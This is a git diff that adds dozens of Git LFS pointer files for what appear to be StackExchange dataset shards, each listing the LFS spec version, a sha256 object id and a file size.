35452269 diff --git a/data/stackexchange/1-1/172_2289.jsonl b/data/stackexchange/1-1/172_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af4f3e922fdcf5bb28f0e56f24fa4cbd367a58f0 --- /dev/null +++ b/data/stackexchange/1-1/172_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f84e7c3a9344ef8316b3499e45df9d8afcb51c3cbf8a17ceab9524a9e75f577 +size 34744065 diff --git a/data/stackexchange/1-1/1730_2289.jsonl b/data/stackexchange/1-1/1730_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5e395f247b15024fe443e238c944b276156544b --- /dev/null +++ b/data/stackexchange/1-1/1730_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c0c8881506d42260225025a21fe7b433f1738d09ff80ac8b8242eaad981b094 +size 35491077 diff --git a/data/stackexchange/1-1/1731_2289.jsonl b/data/stackexchange/1-1/1731_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..218c6a94704b9d29f4422e46e7e40f3741e746e2 --- /dev/null +++ b/data/stackexchange/1-1/1731_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d20d9a28c1916b4717deb23a6e28a1f87ffe1e577cb2b1cee5bc3f55f275c10a +size 35603684 diff --git a/data/stackexchange/1-1/1732_2289.jsonl b/data/stackexchange/1-1/1732_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a934f9da22a4e68c522c7927f952308067d2bc16 --- /dev/null +++ b/data/stackexchange/1-1/1732_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40958742468247bbee5d67c8f8759844f15543a44457b33215905e644849a90a +size 35391968 diff --git a/data/stackexchange/1-1/1733_2289.jsonl b/data/stackexchange/1-1/1733_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1904e6e96e9c1cc9e650b33eac8d79ff8f9d856 --- /dev/null +++ b/data/stackexchange/1-1/1733_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fbc8327d4ffa7efcab32994a0f25b286c03e93d985437d98cb225c94405fb13 +size 35307716 diff --git a/data/stackexchange/1-1/1734_2289.jsonl b/data/stackexchange/1-1/1734_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d404b35143dfb51ec757f67eb580f28368d58ffd --- /dev/null +++ b/data/stackexchange/1-1/1734_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:b5982fa04d76bc8de21263400810e0e347e71630e6303858ddecf8c8243ca333 +size 34908999 diff --git a/data/stackexchange/1-1/1735_2289.jsonl b/data/stackexchange/1-1/1735_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa02462a444a3ff15dc6e2c2576ad9dbfe286739 --- /dev/null +++ b/data/stackexchange/1-1/1735_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82b21dea12c02948f7117bcdb49d984f8dd0183d8a1b8b73de81897eddf1a117 +size 35694730 diff --git a/data/stackexchange/1-1/1736_2289.jsonl b/data/stackexchange/1-1/1736_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7aade9befda01b21d3fa98f6ad0bf05ae6fc799b --- /dev/null +++ b/data/stackexchange/1-1/1736_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd321acb143fce91c9eadbea0a1d0226c10f913b08c85426387b32c8fe560df8 +size 35148803 diff --git a/data/stackexchange/1-1/1737_2289.jsonl b/data/stackexchange/1-1/1737_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c3ac21071f86d333be7e3ffb9ce8a743b7155b8 --- /dev/null +++ b/data/stackexchange/1-1/1737_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3cef4054c74fd9073ea141fd9a1484a9bf0d6b772f893ca8d94ee3598384318 +size 35368928 diff --git a/data/stackexchange/1-1/1738_2289.jsonl b/data/stackexchange/1-1/1738_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23dcd1373b4d48861a0081a2b4bdebe7df40b520 --- /dev/null +++ b/data/stackexchange/1-1/1738_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:92b92aa78b612c5d7046d8aa1299bd1369c81965c3fb76187cc8f2b985b9fb79 +size 35290028 diff --git a/data/stackexchange/1-1/1739_2289.jsonl b/data/stackexchange/1-1/1739_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af7cd626bf180f77cf9667e1685dd2551a361a75 --- /dev/null +++ b/data/stackexchange/1-1/1739_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29d3100b8cdb91dbae3af754a8869e048d2e9c6c638d1dc220ba4ba4caf91aac +size 37350029 diff --git a/data/stackexchange/1-1/173_2289.jsonl b/data/stackexchange/1-1/173_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d3e683e15b1d9535326c245db8f5d4b4d3fb4d6 --- /dev/null +++ b/data/stackexchange/1-1/173_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4f3d953884267fc3d45e3b61c26047ce6a156a7da5440d594b7f4beabc4323f +size 35452933 diff --git a/data/stackexchange/1-1/1740_2289.jsonl b/data/stackexchange/1-1/1740_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e590ac31946fc350f4ba28510fc1c154e316d24 --- /dev/null +++ b/data/stackexchange/1-1/1740_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d456fc09c6923a6671a6bcd1548ddbf330736f3ee20d63e598e07abd7d7332e +size 38417945 diff --git a/data/stackexchange/1-1/1741_2289.jsonl b/data/stackexchange/1-1/1741_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a15fe57dcb8829bfec79989ac37fac33573882e --- /dev/null +++ b/data/stackexchange/1-1/1741_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:963c043965fa2ba6ef68d98eb8536d69ef41389a9c28cea2ca8d9e44baff6d36 +size 37423319 diff --git a/data/stackexchange/1-1/1742_2289.jsonl b/data/stackexchange/1-1/1742_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..a86adb5d6b81379df713e98d93015b8d1c300eb9 --- /dev/null +++ b/data/stackexchange/1-1/1742_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ff0e6a6c1dd0ad573a4528f66708bc5c4d2755b147bcac51d8846969433db28 +size 37639621 diff --git a/data/stackexchange/1-1/1743_2289.jsonl b/data/stackexchange/1-1/1743_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d620ade718ed035aa803710c86f1ce0ccfd84c8f --- /dev/null +++ b/data/stackexchange/1-1/1743_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d85b3f42eae487878ae4cfb92cfb31e56f83caf2c40c611a072f993db886593c +size 37853422 diff --git a/data/stackexchange/1-1/1744_2289.jsonl b/data/stackexchange/1-1/1744_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..24d9707f42c2cb93cfdd5f400bd732da5683eb03 --- /dev/null +++ b/data/stackexchange/1-1/1744_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9269a5dd158c6d49bd51eee940cbdc2e6e2ca11a981b654dbac1dbb20f6e499 +size 38012466 diff --git a/data/stackexchange/1-1/1745_2289.jsonl b/data/stackexchange/1-1/1745_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62cc6d4f92b76219e7da8cc8955593b0afacc1e0 --- /dev/null +++ b/data/stackexchange/1-1/1745_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea6e0f9e639cf2f73fbf21fd0d1a1e2609fc7772247268b6243e07c27e2133f6 +size 38270965 diff --git a/data/stackexchange/1-1/1746_2289.jsonl b/data/stackexchange/1-1/1746_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b88343c814c0b90cd2e1dd1e07d3487c5f7cefc8 --- /dev/null +++ b/data/stackexchange/1-1/1746_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9cd542acfca1804f6990f2125b8e76124768eb9870b5db93eeb23c0c1e5f263 +size 38426954 diff --git a/data/stackexchange/1-1/1747_2289.jsonl b/data/stackexchange/1-1/1747_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4eccd1380ac573aeacccfadd03e42b2fd58cf55c --- /dev/null +++ b/data/stackexchange/1-1/1747_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:666258e5f4c75508fc4b5518f7edd27f2bfe9c7c317638674ac23c3b49828278 +size 38136188 diff --git a/data/stackexchange/1-1/1748_2289.jsonl b/data/stackexchange/1-1/1748_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e0beb5d67c13c3f8b12eca116fe97d6bd04b97c --- /dev/null +++ b/data/stackexchange/1-1/1748_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ed532cdda2d943f67294dfa8a0a1458502f8dbe0adf8a0006fc731fb9d2f7f6 +size 37544322 diff --git a/data/stackexchange/1-1/1749_2289.jsonl b/data/stackexchange/1-1/1749_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4677937adc5863573ad959bfd936e395bf694fdf --- /dev/null +++ b/data/stackexchange/1-1/1749_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abe6d8eeb9c2b552a9c3afe2edad41a50083c48a855eb3aa9258657770cc74b9 +size 37459687 diff --git a/data/stackexchange/1-1/174_2289.jsonl b/data/stackexchange/1-1/174_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c22dd006cca048ebf2c0eed71906880848c05e2f --- /dev/null +++ b/data/stackexchange/1-1/174_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:b210d98eb69a8518ab909ec347a33a77de791ae1b6b436d430801cdbd4ab0d97 +size 34970742 diff --git a/data/stackexchange/1-1/1750_2289.jsonl b/data/stackexchange/1-1/1750_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c6297fdc53b6397ef310942ce413707f04475b1 --- /dev/null +++ b/data/stackexchange/1-1/1750_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fada8052c8f8cb1ae58a8d28d7c66868317c79b0b94d37a1c8391f48e8df6938 +size 38085702 diff --git a/data/stackexchange/1-1/1751_2289.jsonl b/data/stackexchange/1-1/1751_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd98ce9f566b9e9b52e44929f1e2b64aec6dc1a1 --- /dev/null +++ b/data/stackexchange/1-1/1751_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc53a90b006c4e6054a20664fa1cb9c686398e888d6b5c0ad1e21cba78f9c007 +size 37462905 diff --git a/data/stackexchange/1-1/1752_2289.jsonl b/data/stackexchange/1-1/1752_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69fc4c5c2b09565a3a4f12e312d2287baefeb6cb --- /dev/null +++ b/data/stackexchange/1-1/1752_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c1bc29521e13c6f3c255cc23bcb4f2556cc098d421bc035a411c9bc6e7a3c73 +size 37669022 diff --git a/data/stackexchange/1-1/1753_2289.jsonl b/data/stackexchange/1-1/1753_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fa11bdf7e02052dc5934f22dc6fc5cb8ebad67f --- /dev/null +++ b/data/stackexchange/1-1/1753_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eddc8c478776ed362f86231eb87eaa80faff914096660d934808223eecb8bf5b +size 38101108 diff --git a/data/stackexchange/1-1/1754_2289.jsonl b/data/stackexchange/1-1/1754_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..663b22f14a474cff5b66c796206ccc68e2a51366 --- /dev/null +++ b/data/stackexchange/1-1/1754_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f908094b98757f5a05248d99f60ad0bafa6b5935f28f46766203c5d767af767a +size 37709014 diff --git a/data/stackexchange/1-1/1755_2289.jsonl b/data/stackexchange/1-1/1755_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12aa826b638d8ad0b6f4c5f611473090614e5de3 --- /dev/null +++ b/data/stackexchange/1-1/1755_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b482ea5f6f348e45d3372105ebf94baa0a4d40099910ce56d66a2a8fcad78a76 +size 38261119 diff --git a/data/stackexchange/1-1/1756_2289.jsonl b/data/stackexchange/1-1/1756_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83baea6f989c82edc07f15c24bbf1e94995f5b34 --- /dev/null +++ b/data/stackexchange/1-1/1756_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fc15e213785a362c58518bc43c48b554f57b337643c145ec1b1a69d9ba4b119 +size 38198523 diff --git a/data/stackexchange/1-1/1757_2289.jsonl b/data/stackexchange/1-1/1757_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c917aab83837c9615abd980d313216c8f229cc2 --- /dev/null +++ b/data/stackexchange/1-1/1757_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1475c31c32ee6355b18dcc5dc3fba195e8c531715e6cbf0852c6a0bae6f8253 +size 37885046 diff --git a/data/stackexchange/1-1/1758_2289.jsonl b/data/stackexchange/1-1/1758_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..6c48935b49733266d04493c84363cb895580be34 --- /dev/null +++ b/data/stackexchange/1-1/1758_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab727e62bf749d9be81beddd2de5899e6eedaea8043874df99d1abbf256ac910 +size 38191091 diff --git a/data/stackexchange/1-1/1759_2289.jsonl b/data/stackexchange/1-1/1759_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17d7e651874673b81785ee5558dbb53bad599eb7 --- /dev/null +++ b/data/stackexchange/1-1/1759_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:928212f973d50671d0c6b393ff4b05421bd7f00e16c2f2b367b32f5dc209f1cf +size 37596338 diff --git a/data/stackexchange/1-1/175_2289.jsonl b/data/stackexchange/1-1/175_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46dacfeb2aa2ee91e87c3573349763204b36d606 --- /dev/null +++ b/data/stackexchange/1-1/175_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eeb99a305244f4e7c64f4035be76a928753c420b5a3420cd372ac28a61a6ab3d +size 34519722 diff --git a/data/stackexchange/1-1/1760_2289.jsonl b/data/stackexchange/1-1/1760_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f87cc081b86148b25789f06aa92da10de70bde0b --- /dev/null +++ b/data/stackexchange/1-1/1760_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2156e8297759a98db7b539bc07b27b99cbeb8e927fcc1a587ac1b909e63e02fb +size 37853876 diff --git a/data/stackexchange/1-1/1761_2289.jsonl b/data/stackexchange/1-1/1761_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8494e526ad1683ce2a9db0001207d1b313ea3cf9 --- /dev/null +++ b/data/stackexchange/1-1/1761_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85310f9f3caa60eb66cbaf24200090bf90854b950e302e9e9f3cb0a83630365d +size 37329643 diff --git a/data/stackexchange/1-1/1762_2289.jsonl b/data/stackexchange/1-1/1762_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d07f5d4ffe30da0e5d0bf722863f19ecc82ac47 --- /dev/null +++ b/data/stackexchange/1-1/1762_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:78adb991dc55af7123f9ca747a53bb0a804b8f51fbf122edfe48e8572f7ac8dc +size 37713989 diff --git a/data/stackexchange/1-1/1763_2289.jsonl b/data/stackexchange/1-1/1763_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae296f59af6bad1ca60f1597fd7401cbca5e56f7 --- /dev/null +++ b/data/stackexchange/1-1/1763_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c406137f1e79b60b80c89cd0925af31e5c9f873d36fca94d117d13811d8013 +size 38061217 diff --git a/data/stackexchange/1-1/1764_2289.jsonl b/data/stackexchange/1-1/1764_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b863114f5a85aa17ec133613c6bf986cfc1c661b --- /dev/null +++ b/data/stackexchange/1-1/1764_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5159c8e708979b45799ae5440a307cf7184a60a6071cd51c4966f53a52eed1ef +size 37668614 diff --git a/data/stackexchange/1-1/1765_2289.jsonl b/data/stackexchange/1-1/1765_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3931bdd5af387d337e00ceda1fcc4ab8960aed4 --- /dev/null +++ b/data/stackexchange/1-1/1765_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:24e49067fbc21f87c8a875c6d2098bacc4d0e1de4d99282cf1c893bbe4295ee2 +size 37752740 diff --git a/data/stackexchange/1-1/1766_2289.jsonl b/data/stackexchange/1-1/1766_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..010cb6607d616fb268e3ac6ce5003e6f5acaa608 --- /dev/null +++ b/data/stackexchange/1-1/1766_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0116f2ef9cf504f1f72055b8e3b2c04300371b12b3f628f8dd95d3e61c675cce +size 38101718 diff --git a/data/stackexchange/1-1/1767_2289.jsonl b/data/stackexchange/1-1/1767_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83e91c520f1c3680cd2a4e8340f6a89e7d7409e2 --- /dev/null +++ b/data/stackexchange/1-1/1767_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f39a6da1a626d495bad8b75af68714579e731ccc04feceffa1703a94f7b0f19 +size 37425331 diff --git a/data/stackexchange/1-1/1768_2289.jsonl b/data/stackexchange/1-1/1768_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c7b6503eeb3039bf704149070b9262b367709bd --- /dev/null +++ b/data/stackexchange/1-1/1768_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b097451db1ba96d14c4919126853b4327abad1bdf509958f2b3c1a0a97488b1 +size 37999838 diff --git a/data/stackexchange/1-1/1769_2289.jsonl b/data/stackexchange/1-1/1769_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67e02fd56ef3ba84240214ba045fdd9987d25432 --- /dev/null +++ b/data/stackexchange/1-1/1769_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:416fb460c2cbdb8be67d5f88051ed41c0fda1d9abe2acaa81af80a8d1b8653ba +size 38112960 diff --git a/data/stackexchange/1-1/176_2289.jsonl b/data/stackexchange/1-1/176_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..540f6b56ea6d363cae546fea61be933c41ed647f --- /dev/null +++ b/data/stackexchange/1-1/176_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7d6d46e7c155ca35d73e523da51d105a1d2eca825d4b7644b6a14b64981c53c +size 35147994 diff --git a/data/stackexchange/1-1/1770_2289.jsonl b/data/stackexchange/1-1/1770_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c28bf92c3798e6876be7f4386cb2f9edf0ff0e9 --- /dev/null +++ b/data/stackexchange/1-1/1770_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eebe1e9da5b4548efb81aa0d9fcf43c4e12650b29b2fd7491995183dd147012f +size 38317106 diff --git a/data/stackexchange/1-1/1771_2289.jsonl b/data/stackexchange/1-1/1771_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32c49566826844230e1bb03285beb2f36a987606 --- /dev/null +++ b/data/stackexchange/1-1/1771_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9620651636fe34cd6c85f05823b0d173673f3f770a0929ed3656861ae67eada8 +size 37718654 diff --git a/data/stackexchange/1-1/1772_2289.jsonl b/data/stackexchange/1-1/1772_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26caed43f79a633db1ae093f1431b42064bb211d --- /dev/null +++ b/data/stackexchange/1-1/1772_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12939f996b745ac24651108e1ac9c1579eb08b7a7ba94735c11174b47b4b4df7 +size 37313659 diff --git a/data/stackexchange/1-1/1773_2289.jsonl b/data/stackexchange/1-1/1773_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..354ebcd368e27d6d9cef9bc2980e028acb185e0c --- /dev/null +++ b/data/stackexchange/1-1/1773_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:825d2b1e4535ca71314f1a04908748ff264b1c983462f42d5843b3823510aac6 +size 37946870 diff --git a/data/stackexchange/1-1/1774_2289.jsonl b/data/stackexchange/1-1/1774_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea6b463fdebca58439d933c25c47c4625e4a057e --- /dev/null +++ b/data/stackexchange/1-1/1774_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71d5c3aac83484f886cd53700070f4aff887747d1bb9439917c2e717f4a06abc +size 38083896 diff --git a/data/stackexchange/1-1/1775_2289.jsonl b/data/stackexchange/1-1/1775_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7099dfd143e5a39a9208accb5b3501b9f0d7f1eb --- /dev/null +++ b/data/stackexchange/1-1/1775_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f1ae54ba5605a4af129776325baf6533f173b9c6879d8a92f983433cc16910e +size 38019607 diff --git a/data/stackexchange/1-1/1776_2289.jsonl b/data/stackexchange/1-1/1776_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9c2f55101e2c1912de2a2977db0d9f493a9118d --- /dev/null +++ b/data/stackexchange/1-1/1776_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40f848930dd0f69fa1a10f76b6c135206caf442093ef26ca6771c43264f0ddb1 +size 37829279 diff --git a/data/stackexchange/1-1/1777_2289.jsonl b/data/stackexchange/1-1/1777_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d912fa10ad98e8b458334e7dbc3362c7fe744419 --- /dev/null +++ b/data/stackexchange/1-1/1777_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e485276564099a1dde99d3910a04467d0f09514fd7fc1633d3a810491bd8604 +size 38300540 diff --git a/data/stackexchange/1-1/1778_2289.jsonl b/data/stackexchange/1-1/1778_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f3b8b54d3f296204c464f1826e3811838296cdd --- /dev/null +++ b/data/stackexchange/1-1/1778_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce7d29a39deb2600396e5d07ef3989f47cfbee5f2230bdafcdc7596c2dd38463 +size 37707519 diff --git a/data/stackexchange/1-1/1779_2289.jsonl b/data/stackexchange/1-1/1779_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cd7dabaea1fbf545451a8a9dbbc71804ecaa497 --- /dev/null +++ b/data/stackexchange/1-1/1779_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3038a80134c1c86a84a9eb772aefdf3390870451a4e96d488e6725d06a56b300 +size 38132306 diff --git a/data/stackexchange/1-1/177_2289.jsonl b/data/stackexchange/1-1/177_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84ae25fa402867f18a9b3d9b0f306db6529b98de --- /dev/null +++ b/data/stackexchange/1-1/177_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9cb9de0b71e16197c55e68eb22e579516f3efa8657962321b769d56338e9034a +size 35525548 diff --git a/data/stackexchange/1-1/1780_2289.jsonl b/data/stackexchange/1-1/1780_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f42d4066b4c80972ac30eba1f1e513824675a7e --- /dev/null +++ b/data/stackexchange/1-1/1780_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:99bd376f58a2c481b947e07d54da2ba8f414b95b09e636928ac49c3eb9b8803d +size 37648597 diff --git a/data/stackexchange/1-1/1781_2289.jsonl b/data/stackexchange/1-1/1781_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0337840062a65a287bd3010813f370016d1a43c8 --- /dev/null +++ b/data/stackexchange/1-1/1781_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:565d610c8f73ca38bc6555cc1b270e1e99076bbc35e2236bf899dbc57339d813 +size 38000667 diff --git a/data/stackexchange/1-1/1782_2289.jsonl b/data/stackexchange/1-1/1782_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1a77816ff3b153686bf53e5826694e7b4f71ef4 --- /dev/null +++ b/data/stackexchange/1-1/1782_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01fb6d7bca7cff70edeb03497dde070d515f468d124cd2a052ffae46fe84804b +size 38243326 diff --git a/data/stackexchange/1-1/1783_2289.jsonl b/data/stackexchange/1-1/1783_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65cae49f1389a2418c5569b946812bec55dfedea --- /dev/null +++ b/data/stackexchange/1-1/1783_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7496216254f5272c5285f7740eb1d8c3231154fa25df2814a4d0b3aa6fdf4eb +size 37649294 diff --git a/data/stackexchange/1-1/1784_2289.jsonl b/data/stackexchange/1-1/1784_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d2929d7f5ffa4fe9e3f5970448e0dc4cbcbeb77 --- /dev/null +++ b/data/stackexchange/1-1/1784_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd3b9d035cda94919a5bb995671187209ff02069cc162e63df2255b0c59ea6f0 +size 38219931 diff --git a/data/stackexchange/1-1/1785_2289.jsonl b/data/stackexchange/1-1/1785_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02d3aa42225f39012db97b5b41a9d91f93665420 --- /dev/null +++ b/data/stackexchange/1-1/1785_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4689dabdf42bad283276c31314540f71394fb868cb5c9f02629333329da75ac +size 37355699 diff --git a/data/stackexchange/1-1/1786_2289.jsonl b/data/stackexchange/1-1/1786_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d04eff4b05596d23a8dfb70ccd60cdb56677ddf --- /dev/null +++ b/data/stackexchange/1-1/1786_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a686ca969583f2949901ab2239b7d9a03537460d85d495fe54376dd72d854332 +size 37534718 diff --git a/data/stackexchange/1-1/1787_2289.jsonl b/data/stackexchange/1-1/1787_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7bfaaf978f6a0c11b485fa3a369eb73151ec56b --- /dev/null +++ b/data/stackexchange/1-1/1787_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6485c81876c5d34b8e8573a496b8fa82b86e7a35a5a710b18a78766060a3952e +size 38402633 diff --git a/data/stackexchange/1-1/1788_2289.jsonl b/data/stackexchange/1-1/1788_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10bb9308fc491e9b61e507fffe19d8cadd286965 --- /dev/null +++ b/data/stackexchange/1-1/1788_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93bdf8ad210b49bc186a2c865a5de073535095d04455514d82c3b761c107b719 +size 38185797 diff --git a/data/stackexchange/1-1/1789_2289.jsonl 